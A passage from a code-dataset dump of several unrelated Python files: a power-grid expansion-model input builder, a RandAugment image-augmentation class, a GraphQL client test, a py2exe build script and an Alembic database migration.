lambda x: x.Pmax
* const.assumed_pmins.get(x.type, const.assumed_pmins["default"])
if const.assumed_pmins.get(x.type, const.assumed_pmins["default"]) is not None
else x.Pmin,
axis=1,
)
gencost = grid.gencost["before"]
cost_at_min_power = (
gencost.c0 + gencost.c1 * plant_mod.Pmin + gencost.c2 * plant_mod.Pmin**2
)
cost_at_max_power = (
gencost.c0 + gencost.c1 * plant_mod.Pmax + gencost.c2 * plant_mod.Pmax**2
)
single_segment_slope = (cost_at_max_power - cost_at_min_power) / (
plant_mod.Pmax - plant_mod.Pmin
)
single_segment_slope.fillna(0, inplace=True)
return cost_at_min_power, single_segment_slope
def build_financials(base_year):
"""Parse financial parameters constants and base year input to a data frame.
:param int/str base_year: Information to be added in the 'base_year' column.
:return: (*pandas.DataFrame*) -- single-row data frame with all params.
"""
financials = pd.DataFrame([const.financial_parameters])
financials.insert(0, "base_financial_year", base_year)
return financials
def build_fuels():
"""Parse set of fuels to a data frame.
:return: (*pandas.DataFrame*) -- single-row data frame with all params.
"""
fuels = pd.DataFrame({"fuel": const.fuels})
fuels["co2_intensity"] = "0"
fuels["upstream_co2_intensity"] = "."
return fuels
def build_fuel_cost(average_fuel_cost, base_year, inv_period):
"""Create a data frame of average fuel costs by zone and fuel, and project these
costs to future years.
:param pandas.DataFrame average_fuel_cost: average fuel cost by bus_id.
:param list inv_period: list of investment period years, as integers.
:return: (*pandas.DataFrame*) -- data frame of fuel costs by period, zone, and fuel.
"""
fuel_cost = average_fuel_cost.copy()
# Retrieve the original `bus_id` and `fuel` columns, rename `bus_id` to `load_zone`
fuel_cost.reset_index(inplace=True)
fuel_cost.rename(columns={"bus_id": "load_zone"}, inplace=True)
# Duplicate each row N times, where N is the number of investment years
original_fuel_cost_length = len(fuel_cost)
fuel_cost = fuel_cost.loc[fuel_cost.index.repeat(len(inv_period))]
# Fill in different years and inflation values for the repeated rows
fuel_cost["period"] = inv_period * original_fuel_cost_length
inflation_factors = [
(1 + const.financial_parameters["interest_rate"]) ** (year - base_year)
for year in inv_period
]
fuel_cost["inflation"] = inflation_factors * original_fuel_cost_length
# Use inflation values to calculate future fuel costs
fuel_cost["fuel_cost"] = fuel_cost["GenFuelCost"] * fuel_cost["inflation"]
fuel_cost["fuel_cost"] = fuel_cost["fuel_cost"].round(2)
# Clean up columns we don't need
fuel_cost.drop(columns=["GenFuelCost", "inflation"], inplace=True)
# Clean up any rows we don't need
fuel_cost = fuel_cost.query("fuel_cost > 0 and fuel in @const.fuels")
return fuel_cost
def build_generation_projects_info(
plant,
single_segment_slope,
average_fuel_cost,
storage_candidate_buses=None,
):
"""Build data frame for generation_projects_info.
:param pandas.DataFrame plant: data frame of current generators.
:param pandas.Series single_segment_slope: single-segment linearized slope of each
generator's cost curve, from :func:`linearize_gencost`.
:param pandas.DataFrame average_fuel_cost: average fuel cost by bus_id, from
:func:`calculate_average_fuel_cost`.
This is single-column ("GenFuelCost") and multi-index ("bus_id", "fuel").
:param set storage_candidate_buses: buses at which to enable storage expansion.
:return: (*pandas.DataFrame*) -- data frame of generation project info.
"""
# Extract information from inputs
indices = make_plant_indices(plant.index, storage_candidate_buses)
all_plant_indices = indices["existing"] + indices["expansion"] + indices["storage"]
num_storage = len(indices["storage"])
# Use inputs for intermediate calculations
fuel_gencost = single_segment_slope * const.assumed_fuel_share_of_gencost
nonfuel_gencost = single_segment_slope * (1 - const.assumed_fuel_share_of_gencost)
fuel_cost_per_generator = plant.apply(
lambda x: average_fuel_cost.loc[
(x.bus_id, const.fuel_mapping[x.type]), "GenFuelCost"
],
axis=1,
)
estimated_heatrate = (fuel_gencost / fuel_cost_per_generator).fillna(0)
# Finally, construct data frame and return
df = pd.DataFrame(index=pd.Index(all_plant_indices, name="GENERATION_PROJECT"))
# Add columns
df["gen_tech"] = (
plant.type.tolist() * 2 + [const.storage_parameters["tech"]] * num_storage
)
gen_load_zone = plant.bus_id.tolist() * 2
if storage_candidate_buses is not None:
gen_load_zone += sorted(storage_candidate_buses)
df["gen_load_zone"] = gen_load_zone
df["gen_connect_cost_per_mw"] = 0
df["gen_capacity_limit_mw"] = "."
df["gen_full_load_heat_rate"] = estimated_heatrate.tolist() * 2 + [0] * num_storage
df["gen_variable_om"] = nonfuel_gencost.tolist() * 2 + [0] * num_storage
df["gen_max_age"] = [
const.assumed_ages_by_type.get(t, const.assumed_ages_by_type["default"])
for t in plant.type.tolist() * 2
] + [const.storage_parameters["max_age"]] * num_storage
df["gen_min_build_capacity"] = 0
df["gen_scheduled_outage_rate"] = 0
df["gen_forced_outage_rate"] = 0
df["gen_is_variable"] = (
list(plant.type.isin(const.variable_types).astype(int)) * 2 + [0] * num_storage
)
df["gen_is_baseload"] = (
list(plant.type.isin(const.baseload_types).astype(int)) * 2 + [0] * num_storage
)
df["gen_is_cogen"] = 0
df["gen_energy_source"] = (
plant.type.map(const.fuel_mapping).tolist() * 2
+ [const.fuel_mapping["storage"]] * num_storage
)
df["gen_unit_size"] = "."
df["gen_ccs_capture_efficiency"] = "."
df["gen_ccs_energy_load"] = "."
df["gen_storage_efficiency"] = "."
df["gen_store_to_release_ratio"] = "."
if num_storage > 0:
num_gens = len(indices["existing"]) + len(indices["expansion"])
df["gen_storage_efficiency"] = ["."] * num_gens + [
const.storage_parameters["efficiency"]
] * num_storage
df["gen_storage_max_cycles_per_year"] = ["."] * num_gens + [
const.storage_parameters["max_cycles"]
] * num_storage
# Refine data
# Add generation expansion limits
df.loc[indices["expansion"], "gen_capacity_limit_mw"] = [
const.assumed_capacity_limits.get(t, const.assumed_capacity_limits["default"])
for t in plant.type.tolist()
]
# Ensure that no fueled generators with zero heat-rate can be built
df.loc[
(
df.index.isin(indices["expansion"])
& (df.gen_full_load_heat_rate == 0)
& df.gen_energy_source.isin(const.fuels)
),
"gen_capacity_limit_mw",
] = 0
# Ensure that heat rates are not written for non-fueled generators
df.loc[df.gen_energy_source.isin(const.non_fuels), "gen_full_load_heat_rate"] = "."
df.reset_index(inplace=True)
return df
def build_gen_build_costs(
plant,
cost_at_min_power,
inv_period,
storage_candidate_buses=None,
):
"""Build a data frame of generation projects, both existing and hypothetical.
:param pandas.DataFrame plant: data frame of current generators.
:param pandas.Series cost_at_min_power: cost of running generator at minimum power.
:param list inv_period: list of investment period years.
:param set storage_candidate_buses: buses at which to enable storage expansion.
:return: (*pandas.DataFrame*) -- data frame of existing and hypothetical generators.
"""
# Build indices, extract constants used to populate build costs
indices = make_plant_indices(plant.index, storage_candidate_buses)
num_existing = len(indices["existing"])
num_expansion = len(indices["expansion"])
num_storage = len(indices["storage"])
# Build additional lists for each column
existing_overnight = plant["type"].map(const.investment_costs_by_type).tolist()
expansion_overnight = (
existing_overnight
+ [const.storage_parameters["overnight_power_cost"]] * num_storage
)
existing_om = (cost_at_min_power / plant.Pmax).fillna(0.0).tolist()
expansion_om = existing_om + [0] * num_storage
# Extend these lists to multiple investment years
all_indices = indices["existing"] + (
indices["expansion"] + indices["storage"]
) * len(inv_period)
all_build_years = [const.base_year] * num_existing + sum(
[[i] * (num_expansion + num_storage) for i in inv_period], []
)
all_overnight_costs = [0] * num_existing + expansion_overnight * len(inv_period)
all_gen_fixed_om = existing_om + expansion_om * len(inv_period)
# Create a dataframe from the collected lists
gen_build_costs = pd.DataFrame(
{
"GENERATION_PROJECT": all_indices,
"build_year": all_build_years,
"gen_overnight_cost": all_overnight_costs,
"gen_fixed_om": all_gen_fixed_om,
}
)
# Add a relevant storage column, as necessary
if num_storage > 0:
expansion_energy_cost = ["."] * num_expansion + [
const.storage_parameters["overnight_energy_cost"]
] * num_storage
gen_build_costs["gen_storage_energy_overnight_cost"] = [
"."
] * num_existing + expansion_energy_cost * len(inv_period)
return gen_build_costs
def build_gen_build_predetermined(plant):
"""Build a data frame of generator capacity and build year
:param pandas.DataFrame plant: data frame of generators in a grid instance.
:return: (*pandas.DataFrame*) -- data frame of existing generators.
"""
gen_build_predetermined = plant["Pmax"].reset_index()
gen_build_predetermined["build_year"] = 2019
gen_build_predetermined.rename(
columns={
"plant_id": "GENERATION_PROJECT",
"Pmax": "gen_predetermined_cap",
},
inplace=True,
)
indices = make_plant_indices(plant.index)
gen_build_predetermined["GENERATION_PROJECT"] = indices["existing"]
gen_build_predetermined = gen_build_predetermined[
["GENERATION_PROJECT", "build_year", "gen_predetermined_cap"]
]
return gen_build_predetermined
def build_load_zones(bus):
"""Parse bus data frame and load zone constants to a data frame.
:param pandas.DataFrame bus: bus data from a Grid object.
:return: (*pandas.DataFrame*) -- data frame with constants added to bus indices.
"""
load_zones = bus.index.to_frame()
load_zones["dbid"] = range(1, len(load_zones) + 1)
for k, v in const.load_parameters.items():
load_zones[k] = v
load_zones.rename(columns={"bus_id": "LOAD_ZONE"}, inplace=True)
return load_zones
def build_non_fuel_energy_source():
"""Parse list of non fuel energy sources to a data frame
:return: (*pandas.DataFrame*) -- single column data frame with non-fuel energy
sources
"""
non_fuel_energy_source = pd.DataFrame({"energy_source": const.non_fuels})
return non_fuel_energy_source
def build_periods(inv_period, period_start, period_end):
"""Parse user input investment period information into a data frame.
:param list inv_period: list of strings for each investment period year
:param list period_start: list of strings for start year of each period
:param list period_end: list of strings for end year of each period
:return: (*pandas.DataFrame*) -- periods data frame with investment period
information.
"""
periods = pd.DataFrame(columns=["INVESTMENT_PERIOD", "period_start", "period_end"])
periods["INVESTMENT_PERIOD"] = inv_period
periods["period_start"] = period_start
periods["period_end"] = period_end
return periods
def branch_efficiency(from_bus_voltage, to_bus_voltage):
"""Calculate branch efficiency based on start and end bus baseKV.
:param int/float from_bus_voltage: start bus baseKV
:param int/float to_bus_voltage: end bus baseKV
:return: (*float*) -- efficiency rate of a branch
"""
if from_bus_voltage == to_bus_voltage:
return const.assumed_branch_efficiencies.get(
from_bus_voltage, const.assumed_branch_efficiencies["default"]
)
else:
return const.assumed_branch_efficiencies["default"]
def build_aclines(grid):
"""Create a data frame for ac transmission lines with required columns for
:func:`build_transmission_lines`.
:param powersimdata.input.grid.Grid grid: grid instance
:return: (*pandas.DataFrame*) -- ac transmission line data frame
"""
acline = grid.branch[["from_bus_id", "to_bus_id", "rateA"]].reset_index()
acline["trans_length_km"] = list(
map(
haversine,
grid.bus.loc[acline["from_bus_id"], ["lat", "lon"]].values,
grid.bus.loc[acline["to_bus_id"], ["lat", "lon"]].values,
)
)
acline["trans_efficiency"] = list(
map(
branch_efficiency,
grid.bus.loc[acline["from_bus_id"], "baseKV"],
grid.bus.loc[acline["to_bus_id"], "baseKV"],
)
)
acline["branch_id"] = make_branch_indices(acline["branch_id"])
return acline.round(2)
def build_dclines(grid):
"""Create a data frame for dc transmission lines with required columns for
:func:`build_transmission_lines`.
:param powersimdata.input.grid.Grid grid: grid instance
:return: (*pandas.DataFrame*) -- dc transmission line data frame
"""
dcline = grid.dcline[["from_bus_id", "to_bus_id", "Pmax"]].reset_index()
dcline["trans_length_km"] = list(
map(
haversine,
grid.bus.loc[dcline["from_bus_id"], ["lat", "lon"]].values,
grid.bus.loc[dcline["to_bus_id"], ["lat", "lon"]].values,
)
)
dcline["trans_efficiency"] = 0.99
dcline["dcline_id"] = make_branch_indices(dcline["dcline_id"], dc=True)
dcline.rename(columns={"dcline_id": "branch_id", "Pmax": "rateA"}, inplace=True)
return dcline.round(2)
def build_transmission_lines(grid):
"""Parse branch and dcline data frames of a grid instance into a transmission
line data frame with new columns for length and efficiency.
:param powersimdata.input.grid.Grid grid: grid instance
:return: (*pandas.DataFrame*) -- transmission line data frame
"""
acline = build_aclines(grid)
dcline = build_dclines(grid)
transmission_line = pd.concat([dcline, acline], ignore_index=True)
transmission_line.rename(
columns={
"branch_id": "TRANSMISSION_LINE",
"from_bus_id": "trans_lz1",
"to_bus_id": "trans_lz2",
"rateA": "existing_trans_cap",
},
inplace=True,
)
transmission_line = transmission_line[
[
"TRANSMISSION_LINE",
"trans_lz1",
"trans_lz2",
"trans_length_km",
"trans_efficiency",
"existing_trans_cap",
]
]
return transmission_line
def build_trans_params():
"""Parse transmission parameters constants to a data frame.
:return: (*pandas.DataFrame*) -- single-row data frame with all params.
"""
return pd.DataFrame([const.transmission_parameters])
|
py | b415bb192e6231bc5c9a0897700b2c854b358c2a | # Copyright 2021 Adobe
# All Rights Reserved.
# NOTICE: Adobe permits you to use, modify, and distribute this file in
# accordance with the terms of the Adobe license agreement accompanying
# it.
'''
Randaugment
Cubuk, Ekin D., et al. "Randaugment: Practical automated data augmentation with a reduced search space." Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition Workshops. 2020.
The beacon_aug version is adapted from the imgaug:
https://github.com/aleju/imgaug-doc/blob/7443efbf66263c0c44581ed62501fae6f88b047a/imgaug/augmenters/collections.py
Changes to above:
1) change all operators from imgaug to Beacon_aug (support all libraries)
2) result equivalent to calling A.Compose(...)
3) simplify the magnitudes similar to autoaug
e.g.
Create a RandAugment augmenter similar to the suggested hyperparameters in the paper.
.. code-block::
import Beacon_aug as BA
aug = BA.RandAugment(n=2, m=9)
Create a RandAugment augmenter for COCO dataset
.. code-block::
aug = BA.RandAugment(policy= "COCO")
'''
from numpy import lib
# import beacon_aug as BA
from .. import __init__ as BA
import albumentations as A
import cv2
import numpy as np
from imgaug import parameters as iap
from imgaug import random as iarandom
from imgaug.augmenters import meta
from imgaug.augmenters import arithmetic
from imgaug.augmenters import flip
from imgaug.augmenters import pillike
from imgaug.augmenters import size as sizelib
import random
class RandAugment:
"""Apply RandAugment to inputs as described in the corresponding paper.
See paper::
Cubuk et al.
RandAugment: Practical automated data augmentation with a reduced
search space
.. note::
The paper contains essentially no hyperparameters for the individual
augmentation techniques. The hyperparameters used here come mostly
from the official code repository, which however seems to only contain
code for CIFAR10 and SVHN, not for ImageNet. So some guesswork was
involved and a few of the hyperparameters were also taken from
https://github.com/ildoonet/pytorch-randaugment/blob/master/RandAugment/augmentations.py .
This implementation deviates from the code repository for all PIL
enhance operations. In the repository these use a factor of
``0.1 + M*1.8/M_max``, which would lead to a factor of ``0.1`` for the
weakest ``M`` of ``M=0``. For e.g. ``Brightness`` that would result in
a basically black image. This definition is fine for AutoAugment (from
where the code and hyperparameters are copied), which optimizes
each transformation's ``M`` individually, but not for RandAugment,
which uses a single fixed ``M``. We hence redefine these
hyperparameters to ``1.0 + S * M * 0.9/M_max``, where ``S`` is
randomly either ``1`` or ``-1``.
We also note that it is not entirely clear which transformations
were used in the ImageNet experiments. The paper lists some
transformations in Figure 2, but names others in the text too (e.g.
crops, flips, cutout). While Figure 2 lists the Identity function,
this transformation seems to not appear in the repository (and in fact,
the function ``randaugment(N, M)`` doesn't seem to exist in the
repository either). So we also make a best guess here about what
transformations might have been used.
.. warning::
This augmenter only works with image data, not e.g. bounding boxes.
The used PIL-based affine transformations are not yet able to
process non-image data. (This augmenter uses PIL-based affine
transformations to ensure that outputs are as similar as possible
to the paper's implementation.)
Added in 0.4.0.
**Supported dtypes**:
minimum of (
:class:`~imgaug.augmenters.flip.Fliplr`,
:class:`~imgaug.augmenters.size.KeepSizeByResize`,
:class:`~imgaug.augmenters.size.Crop`,
:class:`~imgaug.augmenters.meta.Sequential`,
:class:`~imgaug.augmenters.meta.SomeOf`,
:class:`~imgaug.augmenters.meta.Identity`,
:class:`~imgaug.augmenters.pillike.Autocontrast`,
:class:`~imgaug.augmenters.pillike.Equalize`,
:class:`~imgaug.augmenters.arithmetic.Invert`,
:class:`~imgaug.augmenters.pillike.Affine`,
:class:`~imgaug.augmenters.pillike.Posterize`,
:class:`~imgaug.augmenters.pillike.Solarize`,
:class:`~imgaug.augmenters.pillike.EnhanceColor`,
:class:`~imgaug.augmenters.pillike.EnhanceContrast`,
:class:`~imgaug.augmenters.pillike.EnhanceBrightness`,
:class:`~imgaug.augmenters.pillike.EnhanceSharpness`,
:class:`~imgaug.augmenters.arithmetic.Cutout`,
:class:`~imgaug.augmenters.pillike.FilterBlur`,
:class:`~imgaug.augmenters.pillike.FilterSmooth`
)
n : int or tuple of int or list of int or imgaug.parameters.StochasticParameter or None, optional
Parameter ``N`` in the paper, i.e. number of transformations to apply.
The paper suggests ``N=2`` for ImageNet.
See also parameter ``n`` in :class:`~imgaug.augmenters.meta.SomeOf`
for more details.
Note that horizontal flips (p=50%) and crops are always applied. This
parameter only determines how many of the other transformations
are applied per image.
m : int or tuple of int or list of int or imgaug.parameters.StochasticParameter or None, optional
Parameter ``M`` in the paper, i.e. magnitude/severity/strength of the
applied transformations in interval ``[0 .. 30]`` with ``M=0`` being
the weakest. The paper suggests for ImageNet ``M=9`` in case of
ResNet-50 and ``M=28`` in case of EfficientNet-B7.
This implementation uses a default value of ``(6, 12)``, i.e. the
value is uniformly sampled per image from the interval ``[6 .. 12]``.
This ensures greater diversity of transformations than using a single
fixed value.
* If ``int``: That value will always be used.
* If ``tuple`` ``(a, b)``: A random value will be uniformly sampled per
image from the discrete interval ``[a .. b]``.
* If ``list``: A random value will be picked from the list per image.
* If ``StochasticParameter``: For ``B`` images in a batch, ``B`` values
will be sampled per augmenter (provided the augmenter is dependent
on the magnitude).
cval : number or tuple of number or list of number or imgaug.ALL or imgaug.parameters.StochasticParameter, optional
The constant value to use when filling in newly created pixels.
See parameter `fillcolor` in
:class:`~imgaug.augmenters.pillike.Affine` for details.
The paper's repository uses an RGB value of ``125, 122, 113``.
This implementation uses a single intensity value of ``128``, which
should work better for cases where input images don't have exactly
``3`` channels or come from a different dataset than used by the
paper.
Examples
--------
>>> import imgaug.augmenters as iaa
>>> aug = iaa.RandAugment(n=2, m=9)
Create a RandAugment augmenter similar to the suggested hyperparameters
in the paper.
>>> aug = iaa.RandAugment(m=30)
Create a RandAugment augmenter with maximum magnitude/strength.
>>> aug = iaa.RandAugment(m=(0, 9))
Create a RandAugment augmenter that applies its transformations with a
random magnitude between ``0`` (very weak) and ``9`` (recommended for
ImageNet and ResNet-50). ``m`` is sampled per transformation.
>>> aug = iaa.RandAugment(n=(0, 3))
Create a RandAugment augmenter that applies ``0`` to ``3`` of its
child transformations to images. Horizontal flips (p=50%) and crops are
always applied.
"""
_M_MAX = 30
# according to paper:
# N=2, M=9 is optimal for ImageNet with ResNet-50
# N=2, M=28 is optimal for ImageNet with EfficientNet-B7
# for cval they use [125, 122, 113]
def __new__(cls, policy="imagenet-Resnet50", n=None, m=None, interpolation=cv2.INTER_NEAREST,
cval=0, library="imgaug", *args, **kwargs):
obj = super(RandAugment, cls).__new__(cls)
obj.__init__(policy, interpolation, cval, library, *args, **kwargs)
if n == None or m == None:
if policy.lower() == "imagenet-EfficientNetB7": # Paper Appendix A.2.3
# N=2, M=28 is optimal for ImageNet with EfficientNet-B7
n = 2
m = 28
elif policy.lower() == "cifar":
n = 3
m = 5
elif policy.lower() == "svhn":
n = 3
m = 5
elif policy.lower() == "coco":
n = 1
m = 5
else: # policy.lower() == "imagenet-Resnet50": # Paper Appendix A.2.3
# N=2, M=9 is optimal for ImageNet with ResNet-50
n = 2
m = 9
# The paper says in Appendix A.2.3 "ImageNet", that they actually
# always execute Horizontal Flips and Crops first and only then a
# random selection of the other transformations.
# Hence, we split here into two groups.
initial_augs = obj._create_initial_augmenters_list(m, interpolation, library)
main_augs = obj._create_main_augmenters_list(m, cval, interpolation, library)
# # assign random state to all child augmenters
# for lst in [initial_augs, main_augs]:
# for augmenter in lst:
# augmenter.random_state = rng
return A.Compose([A.Sequential(initial_augs),
A.SomeOf(transforms=main_augs, n=n)]
)
@classmethod # Added in 0.4.0.
def _create_initial_augmenters_list(cls, m, interpolation, library):
# It's not really clear what crop parameters they use, so we
# choose [0..M] here.
# Random crop image and resize to image size
return [
BA.HorizontalFlip(p=0.5, library=library),
BA. KeepSizeCrop()
]
@classmethod # Added in 0.4.0.
def _create_main_augmenters_list(cls, m, cval, interpolation, library):
# pylint: disable=invalid-name
# In the paper's code they use the definition from AutoAugment,
# which is 0.1 + M*1.8/10. But that results in 0.1 for M=0, i.e. for
# Brightness an almost black image, while M=5 would result in an
# unaltered image. For AutoAugment that may be fine, as M is optimized
# for each operation individually, but here we have only one fixed M
# for all operations. Hence, we rather set this to 1.0 +/- M*0.9/10,
# so that M=10 would result in 0.1 or 1.9.
def _get_magnitudes(op_name, level, maxval=1):
'''
_BINS # number of intervals /level
'''
val = None
# name: (magnitudes, signed)
magnitudes_dict = {
"ShearX": (np.linspace(0.0, 0.3, level), True),
"ShearY": (np.linspace(0.0, 0.3, level), True),
"TranslateX": (np.linspace(0.0, 150.0 / 331.0, level), True),
"TranslateY": (np.linspace(0.0, 150.0 / 331.0, level), True),
"Rotate": (np.linspace(0.0, 30.0, level), True),
"Brightness": (np.linspace(0.0, 0.9, level), False),
"Color": (np.linspace(0.0, 0.9, level), False),
"Contrast": (np.linspace(0.0, 0.9, level), False),
"Sharpness": (np.linspace(0.0, 0.9, level), False),
"Posterize": (np.linspace(1, maxval, level), False),
"Solarize": (np.linspace(maxval, 0.0, level), False),
"Cutout": (np.linspace(0, 20 / 32, level), False),
"AutoContrast": (None, None),
"Equalize": (None, None),
"Invert": (None, None),
}
ele = magnitudes_dict[op_name]
if ele[1] == True:
magnitudes_list = ele[0].tolist()
sign = (-1) ** np.random.randint(2, size=1)[0] # -1 ,1
val = sign * random.choice(magnitudes_list)
elif ele[1] == False:
val = random.choice(ele[0])
if op_name in ["ShearX", "ShearY", "TranslateX", "TranslateY", "Posterize", "Solarize"]:
val = int(val)
return val
return [
# meta.Identity(),
BA.Autocontrast(p=1, library=library),
BA.Equalize(p=1, library=library),
BA.Invert(p=1, library=library),
# they use Image.rotate() for the rotation, which uses
# the image center as the rotation center
# BA.Rotate(p=1, library=library,
# limit=_get_magnitudes("Rotate", m)),
# paper uses 4 - int_parameter(M, 4)
BA.Posterize(p=1, library=library, num_bits=4 - _get_magnitudes("Posterize", m, 3)),
# paper uses 256 - int_parameter(M, 256)
BA.Solarize(p=1, library=library,
threshold=256 - _get_magnitudes("Solarize", m, 256)),
# pillike enhance
BA.EnhanceColor(factor=_get_magnitudes("Color", m), p=1, library=library),
BA.EnhanceContrast(factor=_get_magnitudes("Contrast", m), p=1, library=library),
BA.EnhanceBrightness(factor=_get_magnitudes("Brightness", m), p=1, library=library),
BA.EnhanceSharpness(factor=_get_magnitudes("Sharpness", m), p=1, library=library),
# ShearX
BA.Affine(p=1, interpolation=interpolation, cval=cval, library=library,
shear=[_get_magnitudes("ShearX", m), 0]),
# ShearY
BA.Affine(p=1, interpolation=interpolation, cval=cval, library=library,
shear=[0, _get_magnitudes("ShearY", m)]),
# TranslateX
BA.Affine(p=1, interpolation=interpolation, cval=cval, library=library,
translate_px=[_get_magnitudes("TranslateX", m), 0]),
# TranslateY
BA.Affine(p=1, interpolation=interpolation, cval=cval, library=library,
translate_px=[0, _get_magnitudes("TranslateY", m)]),
# paper code uses 20px on CIFAR (i.e. size 20/32), no information
# on ImageNet values so we just use the same values
BA.Cutout(p=1, library=library,
size=_get_magnitudes("Cutout", m),
squared=True,
fill_mode="constant",
cval=cval),
BA.FilterBlur(factor=_get_magnitudes("Sharpness", m), p=1, library=library),
BA.FilterSmooth(p=1, library=library),
]
|
py | b415bb8a1b555334c99ba86310323297f040db7f | import pytest
import requests
import vcr
from gql import Client, gql
from gql.transport.requests import RequestsHTTPTransport
# https://github.com/graphql-python/swapi-graphene
URL = "http://127.0.0.1:8000/graphql"
@pytest.fixture
def client():
with vcr.use_cassette("tests/fixtures/vcr_cassettes/client.yaml"):
request = requests.get(
URL, headers={"Host": "swapi.graphene-python.org", "Accept": "text/html"}
)
request.raise_for_status()
csrf = request.cookies["csrftoken"]
return Client(
transport=RequestsHTTPTransport(
url=URL, cookies={"csrftoken": csrf}, headers={"x-csrftoken": csrf}
),
fetch_schema_from_transport=True,
)
def test_hero_name_query(client):
query = gql(
"""
{
myFavoriteFilm: film(id:"RmlsbToz") {
id
title
episodeId
characters(first:5) {
edges {
node {
name
}
}
}
}
}
"""
)
expected = {
"myFavoriteFilm": {
"id": "RmlsbToz",
"title": "Return of the Jedi",
"episodeId": 6,
"characters": {
"edges": [
{"node": {"name": "Luke Skywalker"}},
{"node": {"name": "C-3PO"}},
{"node": {"name": "R2-D2"}},
{"node": {"name": "Darth Vader"}},
{"node": {"name": "Leia Organa"}},
]
},
}
}
with vcr.use_cassette("tests/fixtures/vcr_cassettes/execute.yaml"):
result = client.execute(query)
assert result == expected
|
py | b415bb8f3db6c717890ce23bc2ba3603f4376f3f | import distutils.core, shutil, os, py2exe, subprocess, os, re, platform
' grep imports from first line of python files in given folder '
def grepimports(dir):
imports = set()
IMPORT_ = 'import '
for f in os.listdir(dir):
p = os.path.join(dir, f)
if not p.endswith("py"): continue
for line in file(p):
if line.startswith(IMPORT_):
for i in line[len(IMPORT_):].split(','):
imports.add(i.strip())
break
return list(imports)
# check revision
svnversion = 'XXX'
try:
svnversion = str(subprocess.check_output("svnversion")).strip()
except:
print("Failed to determine revision - is svnversion in path?")
pass
try:
svnversion = int(svnversion)
print("Source @ revision %s" % svnversion)
except:
svnversion = svnversion.replace(':', '-')
print("Source @ modified revision %s" % svnversion)
arch = platform.architecture()[0]
# clean up
shutil.rmtree(os.path.join("build", arch), True)
# calculate extra files
def make_data_files(roots):
data = []
for root in roots:
if os.path.isdir(root):
for dirpath, dirnames, filenames in os.walk(root, True, None, False):
if filenames:
data.append( (dirpath, [os.path.join(dirpath, f) for f in filenames if not '.pyc' in f]) )
if '__pycache__' in dirnames:
dirnames.remove('__pycache__')
if '.svn' in dirnames:
dirnames.remove('.svn')
else:
data.append( ('', [root]) )
return data
dist = os.path.join("build", arch , "dist")
options = {
"dist_dir": dist,
"includes": grepimports('modules'),
"excludes" : [],
"dll_excludes": ["w9xpopen.exe"],
"packages": []
}
data_files = make_data_files(['contrib', 'modules', 'scripts', 'simscript.ico'])
simscript = {'script':'simscript.py', 'dest_base':'simscript', 'icon_resources':[(1,"simscript.ico")]}
tail = {'script':'tail.py'}
distutils.core.setup(console=[tail], windows=[simscript], options={'py2exe' :options}, data_files=data_files)
shutil.make_archive('build/simscript-%s-r%s' % (arch, svnversion), 'zip', dist, '.')
|
py | b415bb97f0cf3e0f5e499dd01f66df8818e10644 | """initial revision
Revision ID: e28d40a3770c
Revises: 69604d4ceebf
Create Date: 2020-09-15 11:18:51.141736
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "e28d40a3770c"
down_revision = "69604d4ceebf"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"app_1_base_user",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("email", sa.String(), nullable=False),
sa.Column("username", sa.String(), nullable=True),
sa.Column("hashed_password", sa.String(), nullable=False),
sa.Column("date_joined", sa.DateTime(), nullable=True),
sa.Column("first_name", sa.String(), nullable=True),
sa.Column("last_name", sa.String(), nullable=True),
sa.Column("is_staff", sa.Boolean(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("email"),
sa.UniqueConstraint("username"),
)
op.create_table(
"app_1_book",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("title", sa.String(), nullable=True),
sa.Column("author", sa.String(), nullable=True),
sa.Column("publication_date", sa.DateTime(), nullable=False),
sa.Column(
"book_profile",
postgresql.JSONB(astext_type=sa.Text()),
server_default="{}",
nullable=False,
),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"app_1_custom_user",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("email", sa.String(), nullable=False),
sa.Column("username", sa.String(), nullable=True),
sa.Column("hashed_password", sa.String(), nullable=False),
sa.Column("date_joined", sa.DateTime(), nullable=True),
sa.Column("first_name", sa.String(), nullable=True),
sa.Column("last_name", sa.String(), nullable=True),
sa.Column("is_staff", sa.Boolean(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("email"),
sa.UniqueConstraint("username"),
)
op.create_table(
"app_2_base_user",
sa.Column("sex", sa.String(), nullable=True),
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("email", sa.String(), nullable=False),
sa.Column("username", sa.String(), nullable=True),
sa.Column("hashed_password", sa.String(), nullable=False),
sa.Column("date_joined", sa.DateTime(), nullable=True),
sa.Column("first_name", sa.String(), nullable=True),
sa.Column("last_name", sa.String(), nullable=True),
sa.Column("is_staff", sa.Boolean(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("email"),
sa.UniqueConstraint("username"),
)
op.create_table(
"auth_permission",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("name", sa.String(), nullable=False),
sa.Column("key", sa.String(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("key"),
)
op.create_table(
"auth_role",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("name", sa.String(), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("name"),
)
op.create_table(
"app_1_comics",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("book", sa.Integer(), nullable=False),
sa.Column("artist", sa.String(), nullable=True),
sa.ForeignKeyConstraint(
["book"],
["app_1_book.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"auth_role_permission",
sa.Column("role", sa.Integer(), nullable=False),
sa.Column("permission", sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(
["permission"], ["auth_permission.id"], name="permission_fk"
),
sa.ForeignKeyConstraint(["role"], ["auth_role.id"], name="role_fk"),
sa.PrimaryKeyConstraint("role", "permission"),
)
op.create_table(
"auth_user_role",
sa.Column("user", sa.Integer(), nullable=False),
sa.Column("role", sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(
["role"],
["auth_role.id"],
),
